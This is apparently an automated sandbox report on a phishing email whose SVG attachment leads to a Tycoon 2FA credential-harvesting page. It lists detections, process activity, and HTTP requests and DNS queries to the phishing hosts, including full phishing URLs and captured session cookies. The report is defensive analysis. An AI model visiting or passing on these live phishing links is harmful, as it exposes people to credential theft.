Windows Analysis Report
Attached_image+from+ADMIN@weareworkspace.com.eml

Overview

General Information

Sample name: Attached_image+from+ADMIN@weareworkspace.com.eml
Analysis ID: 1641469
MD5: 2d1af9462bcd19be477567f98b92c668
SHA1: 9a8d1963e58b01428e7978ecf98cf7e2be09dfa5
SHA256: 9bfbd17ee769100f624267016c853a93c194b10b418b12c17d4601da5b44148c
Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score: 88
Range: 0 - 100
Confidence: 100%

Signatures

Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
AI detected suspicious elements in Email content
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores large binary data to the registry

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 7148 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Attached_image+from+ADMIN@weareworkspace.com.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 2984 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "C7C092BC-F5BA-4EAC-B301-6EE4C1945B50" "4DC11E76-292E-400D-89B7-9348BCE65614" "7148" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\T3CX17XI\2758881647.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2188,i,1755252170124573955,2774768264017984902,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • HxOutlook.exe (PID: 7972 cmdline: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca MD5: DAE7C9F85DD916DCEB52B69422A09603)
  • HxAccounts.exe (PID: 3280 cmdline: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe" -ServerName:microsoft.windowslive.manageaccounts.AppXdbf3yp5apt3t7q877db3gnz5zqpf71zj.mca MD5: AD64E194A7AE0AAE56E00CCA30F12D2E)
  • cleanup
Yara matches (Source | Rule | Description | Author | Strings):

  dropped/chromecache_73 | JoeSecurity_HtmlPhish_44     | Yara detected HtmlPhish_44                     | Joe Security
  1.3.d.script.csv       | JoeSecurity_Tycoon2FA_1      | Yara detected Tycoon 2FA PaaS                  | Joe Security
  1.3.d.script.csv       | JoeSecurity_AntiDebugBrowser | Yara detected AntiDebug via timestamp check    | Joe Security
  1.7..script.csv        | JoeSecurity_Tycoon2FA_1      | Yara detected Tycoon 2FA PaaS                  | Joe Security
  1.2.d.script.csv       | JoeSecurity_HangulCharacter  | Yara detected Obfuscation Via HangulCharacter  | Joe Security
  1.2.d.script.csv       | JoeSecurity_InvisibleJS      | Yara detected Invisible JS                     | Joe Security

Sigma matches:
  Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
  Source: Registry Key set, Author: frack113, Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\T3CX17XI\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
Suricata: No Suricata rule has matched

              Phishing

Source: Yara match, File source: dropped/chromecache_73, type: DROPPED
Source: Yara match, File source: 1.2.d.script.csv, type: HTML
Source: Yara match, File source: 1.0.pages.csv, type: HTML
Source: Yara match, File source: 1.2.d.script.csv, type: HTML
Source: Yara match, File source: 1.0.pages.csv, type: HTML
Source: Yara match, File source: 1.3.d.script.csv, type: HTML
Source: Yara match, File source: 1.7..script.csv, type: HTML
Source: Yara match, File source: 1.0.pages.csv, type: HTML
Source: 1.3.d.script.csv, Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, blocking keyboard shortcuts, disabling right-click context menus, and redirecting the user to an unrelated website. These behaviors are highly suspicious and indicate potential malicious intent, such as preventing the user from interacting with the page or redirecting them to a phishing site.
Source: 1.1..script.csv, Joe Sandbox AI: Detected suspicious JavaScript with source url: https://cloud_weareworkspace_userid_admin_797870_1... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending data to an untrusted domain, which further increases the risk. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
Source: 1.2.d.script.csv, Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behavior by using the `eval()` function to execute dynamic code, which poses a significant security risk. The script also appears to be heavily obfuscated, further increasing the risk. Overall, this script should be considered highly suspicious and potentially malicious.
Source: Email, Joe Sandbox AI: Detected potential phishing email: The email is sent from an address (info@servis.ai) that does not match the domain of the supposed sender (ADMIN@weareworkspace.com), which is a common phishing tactic. The email contains a generic message 'Above for your perusal' with an attachment, which is a typical phishing strategy to entice the recipient to open potentially malicious files. The email includes a suspicious link to report spam, which could be a phishing link designed to harvest credentials or personal information.
Source: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/#madmin%40weareworkspace.com, HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>AI UI Template</title> <style> body { font-family: 'Segoe UI', Tahoma, Geneva,...
Source: Email, Classification: Credential Stealer
Source: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/#madmin%40weareworkspace.com, HTTP Parser: No favicon
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49710 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.17:49722 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.17:49721 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49727 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49725 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.17:49726 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.17:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.17:49731 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.186.164:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.17:49734 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.17:49735 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49737 version: TLS 1.2
Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.203 (4 entries)
Source: unknown, TCP traffic detected without corresponding DNS query: 51.132.193.104 (3 entries)
Source: unknown, TCP traffic detected without corresponding DNS query: 2.17.190.73 (3 entries)
Source: unknown, TCP traffic detected without corresponding DNS query: 52.109.28.46 (3 entries)
Source: unknown, TCP traffic detected without corresponding DNS query: 184.86.251.25 (1 entry)
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (24 entries)
Source: unknown, TCP traffic detected without corresponding DNS query: 142.250.186.99 (2 entries)
Source: unknown, TCP traffic detected without corresponding DNS query: 13.107.246.67 (6 entries)
Source: global traffic, HTTP traffic detected:
  GET /jFIlzWqSXCfn6wNHvB6C4VOJ6eUL2XfKC41xF6IAkhhtCs7xTdngwFjRLPyuMHCrRLgWgWS9Lz3mCBCLHAyGS3LqWNfKsMB2OjTOub2JcUNPZwEa39XlF6nCaRVOlRBan99j9oRo3PlIuwhrbT6tOqHhsNgZu1kNmotrgkGcmEpfwGfZL7kNR3x5TcEIoaX5gc4b5xlh/0kH7FYAJC6z7gu5UqtFDdKEemyYtMEX4qvSzJaofSVWjumVcKRIHYRUkgZosSgjugIzNpiZIWWgcI6g19a8O6BeSmjnpkEKsPmq0Er6nPcprXPaGCNbZmWTZK2XWUAP5b3Rtl7lXvyxtd8XxJRKonLcrA5T696jpVLnQ2nMY6AYJpsGmoAkzBk8CZJCvsxctEl43p0GK/admin@weareworkspace.com HTTP/1.1
  Host: mjj6bxg1xo.moydovv.com
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /s23Rup/ HTTP/1.1
  Host: cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru
  Connection: keep-alive
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: document
  Referer: https://mjj6bxg1xo.moydovv.com/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
  Host: cdnjs.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /jquery-3.6.0.min.js HTTP/1.1
  Host: code.jquery.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /favicon.png HTTP/1.1
  Host: developers.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Sec-Fetch-Storage-Access: active
  Referer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /favicon.png HTTP/1.1
  Host: developers.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
  Cookie: __cf_bm=DDmX_XoIBvXwOz5rXfO3j1wHm629DOTBS.sIeovNqDo-1742288336-1.0.1.1-UAveshrge6.kXwGfohoX.AUfsSK0xFlWsk7cf33p44O8TUYcriOfxawvJqOQgU0leuNFCXMxCEheidna.0pCILefkDRNrh2Wm_ybsDmiRxk
Source: global traffic, HTTP traffic detected:
  GET /loray$68hba2u HTTP/1.1
  Host: qnj64b.cuisbp.ru
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Origin: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /loray$68hba2u HTTP/1.1
  Host: qnj64b.cuisbp.ru
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Host: cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
  Cookie: XSRF-TOKEN=eyJpdiI6IjNYWTRidElnSU5rMU9hekhXYkR2VFE9PSIsInZhbHVlIjoibmZ3V2RGZVpGcjgwRTdKS1ZyQlpNWkpVZkgxdUhTak5VN2VtQmVyZEY2Wi9nT0N4STZyZjZyS1NGeU0wYm11c0NxWlF5M2IzeHZwUEhJQWNTWW5uR0NwLzAvdmsvM2lVa1FEWjl5VlhGV3JlRGdkYllwY0lyTW5tUkxKelVsKzAiLCJtYWMiOiIxZTc3MmE4MDUxNmJkMTRjMjM2ZDI4NjJiMWYzMTczMjQ3OWJmY2MwY2Q0NjdlYTY5YjcwYzkzZjNlNTMyNmQwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjU3OXBZRVhPaER0NlExYnFEU0g4RVE9PSIsInZhbHVlIjoiZ1VpcXlJMVVmRG9GaFlCOG1tVmZZWDA1WGtDQkgrNDZrL3JXeCt1M0lZTTZWNzJ5Z3BLeXZlT2IxajRoNnpXUnRDWW40elZFQWVYa3FRZDYwaHRJMG1LUnpMMVRQSlMwNTd4Nm56dThxdzhCejJKNG5xS3ZYSW1yV0V0RVJMSlgiLCJtYWMiOiI1MmRkODZhMTQ5NjQ2Mzc3MGMyNjkyZGM3Mjg1MWRiNGYzNjhmNmE0ZTJiMDM0MGRlMTMzMTJiZWJmOWU3YzhmIiwidGFnIjoiIn0%3D
Source: global traffic, DNS traffic detected: DNS query: mjj6bxg1xo.moydovv.com
Source: global traffic, DNS traffic detected: DNS query: cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru
Source: global traffic, DNS traffic detected: DNS query: code.jquery.com
Source: global traffic, DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic, DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic, DNS traffic detected: DNS query: developers.cloudflare.com
Source: global traffic, DNS traffic detected: DNS query: www.google.com
Source: global traffic, DNS traffic detected: DNS query: qnj64b.cuisbp.ru
Source: global traffic, DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknown, HTTP traffic detected:
  POST /report/v4?s=90lpMl7Mac9wXVL3CCWCwLlkaazUjV%2FAakqPfI%2BnTr3i3NwmI3T20R1QCSXhOeDdXfGm4wpD19oQ%2FP2eqnEHZu2MW0XHJR6oupfZDcm4uef7WamQSFT1B%2FWUHYFy HTTP/1.1
  Host: a.nel.cloudflare.com
  Connection: keep-alive
  Content-Length: 540
  Content-Type: application/reports+json
  Origin: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 18 Mar 2025 08:59:22 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90lpMl7Mac9wXVL3CCWCwLlkaazUjV%2FAakqPfI%2BnTr3i3NwmI3T20R1QCSXhOeDdXfGm4wpD19oQ%2FP2eqnEHZu2MW0XHJR6oupfZDcm4uef7WamQSFT1B%2FWUHYFy"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Vary: Accept-Encoding
  server-timing: cfL4;desc="?proto=TCP&rtt=28289&min_rtt=28265&rtt_var=10648&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2342&delivery_rate=101749&cwnd=251&unsent_bytes=0&cid=5ee237afc4059ba3&ts=114&x=0"
  Cache-Control: max-age=14400
  CF-Cache-Status: MISS
  Server: cloudflare
  CF-RAY: 922388969acf0f78-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1469&rtt_var=567&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2009&delivery_rate=1903520&cwnd=233&unsent_bytes=0&cid=53d10da0d5ba754d&ts=8063&x=0"
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown, Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown, Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49677
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown, Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown, Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown, Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49737 -> 443
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\scoped_dir6408_781836407
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File deleted: C:\Windows\SystemTemp\scoped_dir6408_781836407
Source: classification engine, Classification label: mal88.phis.evad.winEML@28/15@24/104
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250318T0458380003-7148.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, File read: C:\Users\desktop.ini
Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Attached_image+from+ADMIN@weareworkspace.com.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "C7C092BC-F5BA-4EAC-B301-6EE4C1945B50" "4DC11E76-292E-400D-89B7-9348BCE65614" "7148" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\T3CX17XI\2758881647.svg
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2188,i,1755252170124573955,2774768264017984902,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe  Process created: unknown unknown
              Source: unknown  Process created: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca
